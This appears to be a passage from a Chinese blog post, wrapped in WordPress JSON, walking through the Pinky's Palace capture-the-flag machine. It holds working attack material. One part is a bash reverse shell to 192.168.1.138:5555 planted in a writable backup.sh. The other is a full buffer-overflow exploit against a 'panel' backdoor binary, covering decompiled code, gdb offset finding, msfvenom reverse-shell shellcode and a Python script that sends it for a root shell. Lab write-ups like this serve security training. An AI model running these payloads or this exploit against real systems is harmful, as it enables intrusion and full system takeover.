\u9519\u8bef\uff0c\u53ef\u80fd\u6709\u4ee5\u4e0b\u51e0\u79cd\u60c5\u51b5\uff1a\n\n\u4f60\u5f53\u524d\u7684\u767b\u5f55\u4f1a\u8bdd\u53ef\u80fd\u6ca1\u6709\u6b63\u786e\u7684\u6743\u9650\u6216\u8005\u6ca1\u6709\u6b63\u786e\u5730\u7ee7\u627f\u6240\u5c5e\u7ec4\u6743\u9650\u3002\u4f60\u53ef\u4ee5\u5c1d\u8bd5\u91cd\u65b0\u767b\u5f55\u6216\u8005\u91cd\u65b0\u52a0\u8f7d\u4f60\u7684\u7528\u6237\u7ec4\u4fe1\u606f\uff0c\u7136\u540e\u518d\u5c1d\u8bd5\u8bfb\u53d6\u6587\u4ef6\u3002\n\u6587\u4ef6\u6743\u9650\u8bbe\u7f6e\u53ef\u80fd\u5b58\u5728\u95ee\u9898\uff0c\u5c24\u5176\u662f\u6240\u5c5e\u7ec4\u6743\u9650\u6ca1\u6709\u8bbe\u7f6e\u4e3a\u53ef\u8bfb\u53d6\u3002\u4f60\u53ef\u4ee5\u4f7f\u7528 ls -l \u547d\u4ee4\u67e5\u770b\u6587\u4ef6\u6743\u9650\u8be6\u7ec6\u4fe1\u606f\uff0c\u7136\u540e\u4f7f\u7528 chmod \u547d\u4ee4\u66f4\u6539\u6587\u4ef6\u6743\u9650\u3002\n\u6587\u4ef6\u53ef\u80fd\u5df2\u635f\u574f\u6216\u88ab\u5176\u4ed6\u8fdb\u7a0b\u5360\u7528\uff0c\u5bfc\u81f4\u65e0\u6cd5\u8bfb\u53d6\u3002\n\u4f60\u53ef\u4ee5\u5c1d\u8bd5\u4ee5\u4e0b\u51e0\u79cd\u65b9\u6cd5\u6765\u89e3\u51b3\u8fd9\u4e2a\u95ee\u9898\uff1a\n\n\u786e\u4fdd\u4f60\u5f53\u524d\u7684\u767b\u5f55\u4f1a\u8bdd\u62e5\u6709\u6b63\u786e\u7684\u6743\u9650\u6216\u8005\u91cd\u65b0\u52a0\u8f7d\u7528\u6237\u7ec4\u4fe1\u606f\u3002\n\u786e\u4fdd\u6587\u4ef6 backup.sh \u7684\u6240\u5c5e\u7ec4\u6743\u9650\u4e2d\u5305\u542b\u53ef\u8bfb\u53d6\u6743\u9650\u3002\n\u68c0\u67e5\u6587\u4ef6\u662f\u5426\u88ab\u5176\u4ed6\u8fdb\u7a0b\u5360\u7528\u6216\u8005\u635f\u574f\uff0c\u5bfc\u81f4\u65e0\u6cd5\u8bfb\u53d6\u3002<\/code><\/pre>\n\n\n\n
    \n
  1. \u91cd\u65b0\u52a0\u8f7d\u7528\u6237\u7ec4\u4fe1\u606f<\/strong>\uff1a\n
      \n
    • \u5982\u679c\u4f60\u5bf9\u6240\u5c5e\u7ec4\u6743\u9650\u7684\u53d8\u5316\u4e0d\u786e\u5b9a\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u91cd\u65b0\u52a0\u8f7d\u7528\u6237\u7ec4\u4fe1\u606f\u3002\u8fd9\u5728\u4e00\u4e9bLinux\u53d1\u884c\u7248\u4e0a\u53ef\u80fd\u9700\u8981\u7ba1\u7406\u5458\u6743\u9650\u3002bashCopy codesudo su - # \u5207\u6362\u5230\u8d85\u7ea7\u7528\u6237 newgrp pinky # \u91cd\u65b0\u52a0\u8f7d\u6240\u5c5e\u7ec4\u4fe1\u606f exit # \u9000\u51fa\u8d85\u7ea7\u7528\u6237<\/code><\/li>\n<\/ul>\n<\/li>\n<\/ol>\n\n\n\n
      newgrp\ncat backup.sh\n\/bin\/bash -c \"bash -i >& \/dev\/tcp\/192.168.1.138\/5555 0>&1\"<\/code><\/pre>\n\n\n\n
      echo ‘\/bin\/bash -c “bash -i >& \/dev\/tcp\/192.168.1.138\/5555 0>&1″‘ >backup.sh<\/p>\n\n\n\n
      nc -lvp   5555<\/p>\n\n\n\n
      \u7b49\u5f85\u53cd\u5f39shell \u7684\u8fde\u63a5<\/p>\n\n\n\n
      \u83b7\u5f97\u4e00\u4e2ashell  \u767b\u9646 demon<\/p>\n\n\n\n
      demon@Pinkys-Palace:\/dev$ find \/ -writable -type f 2>\/dev\/null | grep -v \/proc | grep -v \/home\n<-type f 2>\/dev\/null | grep -v \/proc | grep -v \/home\n\/daemon\/panel\n\/var\/www\/html\/apache\/wp-config.php\n\/usr\/local\/bin\/backup.sh\n\/sys\/fs\/cgroup\/memory\/cgroup.event_control\ndemon@Pinkys-Palace:\/dev$ \n<\/code><\/pre>\n\n\n\n
      pwn<\/h2>\n\n\n\n
      \u53d1\u73b0\u4e00\u4e2a\u6587\u4ef6  \/daemon\/panel<\/p>\n\n\n\n
      demon@Pinkys-Palace:\/daemon$ strings panel \n\/lib64\/ld-linux-x86-64.so.2\nd.jb\nlibc.so.6\nsocket\nstrcpy\nexit\nhtons\nwait\nfork\nlisten\nprintf\nstrlen\nsend\nmemset\nbind\nrecv\nsetsockopt\nclose\naccept\n__libc_start_main\n<\/code><\/pre>\n\n\n\n
      \u4f7f\u7528 ghidra  \u53cd\u7f16\u8bd1 panel<\/p>\n\n\n\n
      \nvoid main(void)\n\n{\n  int dd;\n  ssize_t ff;\n  undefined ch [4108];\n  socklen_t w;\n  sockaddr q;\n  sockaddr r;\n  undefined4 b;\n  int t;\n  int c;\n  undefined4 a;\n  __pid_t local_c;\n  \n  while( true ) {\n    local_c = fork();\n    if (local_c == 0) break;\n    wait((void *)0x0);\n  }\n  a = 1;\n  b = 1;\n  c = socket(2,1,0);\n  if (c == -1) {\n    fatal(\"[-] Fail in socket\");\n  }\n  dd = setsockopt(c,1,2,&b,4);\n  if (dd == -1) {\n    fatal(\"setting sock options\");\n  }\n  r.sa_family = 2;\n  r.sa_data._0_2_ = htons(0x7a69);\n  r.sa_data[2] = '\\0';\n  r.sa_data[3] = '\\0';\n  r.sa_data[4] = '\\0';\n  r.sa_data[5] = '\\0';\n  memset(r.sa_data + 6,0,8);\n  dd = bind(c,&r,0x10);\n  if (dd == -1) {\n    fatal(\"binding to socket\");\n  }\n  dd = listen(c,5);\n  if (dd == -1) {\n    fatal(\"listening\");\n  }\n  w = 0x10;\n  t = accept(c,&q,&w);\n  if (t == -1) {\n    fatal(\"new sock failed\");\n  }\n  send(t,\"[+] Welcome to The Daemon [+]\\n\",0x1f,0);\n  send(t,\"This is soon to be our backdoor\\n\",0x21,0);\n  send(t,\"into Pinky\\'s Palace.\\n=> \",0x19,0);\n  ff = recv(t,ch,0x1000,0);\n  a = (undefined4)ff;\n  handlecmd(ch,t);\n  close(t);\n                    \/* WARNING: Subroutine does not return *\/\n  exit(0);\n}<\/code><\/pre>\n\n\n\n
      \u8fd9\u6bb5\u4ee3\u7801\u662f\u4e00\u4e2a\u7b80\u5355\u7684\u670d\u52a1\u5668\u7a0b\u5e8f\uff0c\u76d1\u542c\u6307\u5b9a\u7aef\u53e3\uff0c\u63a5\u53d7\u5ba2\u6237\u7aef\u8fde\u63a5\uff0c\u5e76\u5411\u5ba2\u6237\u7aef\u53d1\u9001\u6b22\u8fce\u6d88\u606f\u3002\u63a5\u53d7\u5ba2\u6237\u7aef\u53d1\u9001\u7684\u547d\u4ee4\uff0c\u5e76\u8c03\u7528handlecmd<\/code>\u51fd\u6570\u5904\u7406\u547d\u4ee4 <\/p>\n\n\n\n
      \u9700\u8981\u6ce8\u610f\u7684\u662f\uff0c\u4ee3\u7801\u4e2d\u4f7f\u7528\u4e86fork<\/code>\u51fd\u6570\u521b\u5efa\u5b50\u8fdb\u7a0b\u6765\u5904\u7406\u5ba2\u6237\u7aef\u8fde\u63a5\uff0c\u4ee5\u5b9e\u73b0\u591a\u5ba2\u6237\u7aef\u5e76\u53d1\u5904\u7406<\/p>\n\n\n\n
      \u9700\u8981\u6ce8\u610f\u7684\u662f\uff0c\u4ee3\u7801\u4e2d\u4f7f\u7528\u4e86fork\u51fd\u6570\u521b\u5efa\u5b50\u8fdb\u7a0b\u6765\u5904\u7406\u5ba2\u6237\u7aef\u8fde\u63a5\uff0c\u4ee5\u5b9e\u73b0\u591a\u5ba2\u6237\u7aef\u5e76\u53d1\u5904\u7406<\/code><\/pre>\n\n\n\n
      void handlecmd(char *hhh,int param_2)\n\n{\n  size_t __n;\n  char local_78 [112];\n  \n  strcpy(local_78,hhh);\n  __n = strlen(local_78);\n  send(param_2,local_78,__n,0);\n  return;\n}\n<\/code><\/pre>\n\n\n\n
      \u53ef\u4ee5\u770b\u5230  \u8fd9\u91cc\u5b58\u5728\u4e00\u4e2a\u7f13\u51b2\u533a\u6ea2\u51fa\u7684\u6f0f\u6d1e<\/p>\n\n\n\n
      fork()<\/code>\u00a0\u521b\u5efa\u4e86\u65b0\u7684\u5b50\u8fdb\u7a0b\uff0c\u800c GDB \u9ed8\u8ba4\u53ea\u4f1a\u8ddf\u8e2a\u4e00\u4e2a\u8fdb\u7a0b<\/p>\n\n\n\n
      \u4f7f\u7528gdb\u8c03\u8bd5\u7684\u65f6\u5019\uff0cgdb\u53ea\u80fd\u8ddf\u8e2a\u4e00\u4e2a\u8fdb\u7a0b\u3002\u53ef\u4ee5\u5728fork\u51fd\u6570\u8c03\u7528\u4e4b\u524d\uff0c\u901a\u8fc7\u6307\u4ee4\u8bbe\u7f6egdb\u8c03\u8bd5\u5de5\u5177\u8ddf\u8e2a\u7236\u8fdb\u7a0b\u6216\u5b50\u8fdb\u7a0b\u3002\u9ed8\u8ba4\u60c5\u51b5\u4e0bgdb\u662f\u8ddf\u8e2a\u7236\u8fdb\u7a0b\u7684\u3002<\/p>\n\n\n\n
       (gdb) set follow-fork-mode child\n(gdb) set detach-on-fork off\nshow follow-fork-mode<\/code><\/pre>\n\n\n\n
      gdb .\/panel\n(gdb) show follow-fork-mode\nDebugger response to a program call of fork or vfork is \"parent\".\n(gdb) set follow-fork-mode child\n(gdb) set detach-on-fork off\n(gdb) show follow-fork-mode\nDebugger response to a program call of fork or vfork is \"child\".\n<\/code><\/pre>\n\n\n\n
      \u5148\u6765\u5bfb\u627e\u504f\u79fb\u91cf  \u53ef\u4ee5\u770b\u5230\u504f\u79fb\u91cf  \u4e3a120  <\/p>\n\n\n\n
      \n
      \"\"<\/div><\/figure>\n<\/figure>\n\n\n\n
      \u4f7f\u7528 x\/80x $rsp  \u53ef\u4ee5\u67e5\u770b \u4ecersp\u5f00\u59cb\u768480\u4e2a\u516d\u8fdb\u5236\u6570    <\/p>\n\n\n\n
      x\/s $rsp  \u67e5\u770b\u4ecersp\u5f00\u59cb\u7684\u5b57\u7b26<\/p>\n\n\n\n
      x\/s<\/code>  0x****** \u547d\u4ee4\u7528\u4e8e\u67e5\u770b\u5185\u5b58\u4e2d\u4ee5\u67d0\u4e2a\u5730\u5740\u5f00\u59cb\u7684\u5b57\u7b26\u4e32<\/p>\n\n\n\n
      \u53ef\u4ee5\u770b\u5230rbp\u88ab\u516b\u4e2aA\u8986\u76d6  \u53ef\u4ee5\u77e5\u9053  \u6808\u7684\u957f\u5ea6\u662f112    \u4ece120\u4e4b\u540e\u5f00\u59cb\u8986\u76d6rip<\/p>\n\n\n\n
      \u589e\u52a0\u56db\u4e2a\u5b57\u8282\u7684C  \u8986\u76d6rip   echo “$(python -c ‘print(“A”*120+”B”<\/em>*4)’)” | nc 127.0.0.1 31337<\/p>\n\n\n\n
      \"\"<\/div><\/figure>\n\n\n\n
      \u5f00\u59cb\u6784\u9020 shellcode 119\u4e2a\u5b57\u8282<\/p>\n\n\n\n
      msfvenom -p linux\/x86\/shell_reverse_tcp lhost=192.168.1.138 lport=5555 -f python -b \"\\x00\\x0a\\x0d\"<\/code><\/pre>\n\n\n\n
      \u5bfb\u627e  call rsp<\/p>\n\n\n\n
      objdump -DS panel | less -p .text | grep -i call\n 400cfb:       ff d4                   call   *%rsp\n<\/code><\/pre>\n\n\n\n
      A*120+B*4  124<\/p>\n\n\n\n
      shellcode+nop+rip   119+1+4<\/p>\n\n\n\n
      \u7f16\u5199\u5229\u7528\u811a\u672c<\/p>\n\n\n\n
      import sys\nimport socket\nimport time\n\nbuf =  b\"\"\nbuf += b\"\\x48\\x31\\xc9\\x48\\x81\\xe9\\xf6\\xff\\xff\\xff\\x48\\x8d\"\nbuf += b\"\\x05\\xef\\xff\\xff\\xff\\x48\\xbb\\x23\\x9b\\xf5\\x47\\xb4\"\nbuf += b\"\\x21\\x13\\x93\\x48\\x31\\x58\\x27\\x48\\x2d\\xf8\\xff\\xff\"\nbuf += b\"\\xff\\xe2\\xf4\\x49\\xb2\\xad\\xde\\xde\\x23\\x4c\\xf9\\x22\"\nbuf += b\"\\xc5\\xfa\\x42\\xfc\\xb6\\x5b\\x2a\\x21\\x9b\\xe0\\xf4\\x74\"\nbuf += b\"\\x89\\x12\\x19\\x72\\xd3\\x7c\\xa1\\xde\\x31\\x49\\xf9\\x09\"\nbuf += b\"\\xc3\\xfa\\x42\\xde\\x22\\x4d\\xdb\\xdc\\x55\\x9f\\x66\\xec\"\nbuf += b\"\\x2e\\x16\\xe6\\xd5\\xf1\\xce\\x1f\\x2d\\x69\\xa8\\xbc\\x41\"\nbuf += b\"\\xf2\\x9b\\x68\\xc7\\x49\\x13\\xc0\\x6b\\x12\\x12\\x15\\xe3\"\nbuf += b\"\\x69\\x9a\\x75\\x2c\\x9e\\xf5\\x47\\xb4\\x21\\x13\\x93\"\n#0400cfb\nrip=b\"\\xfb\\x0c\\x40\\x00\"\nf=b'\\x90'\nbuf=buf+f+rip\nclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient.connect(('192.168.1.150',31337))\nclient.send(buf+b'\\n')\n                       <\/code><\/pre>\n\n\n\n
      nc -lvp 5555<\/p>\n\n\n\n
      \u83b7\u5f97\u53cd\u5f39shell  \u767b\u9646root<\/p>\n","protected":false},"excerpt":{"rendered":"
      \u51fd\u6570\u8c03\u7528\u6808\u5206\u6790 – \u77e5\u4e4e (zhihu.com) \u4e00\u3001\u4fe1\u606f\u6536\u96c6 \u6839\u636e\u63d0\u793a \u6dfb\u52a0\u4e00\u4e2a\u57df\u540d\u5230 \/etc […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[31,32,44,57,68,77,86,105,115],"class_list":["post-381","post","type-post","status-publish","format-standard","hentry","category-target-aircraft","tag-fork-","tag-gdb","tag-knock","tag-objdump","tag-pwn","tag-shell-for","tag-ssh2john","tag-105","tag-115"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/381","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=381"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/381\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=381"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=381"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=381"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}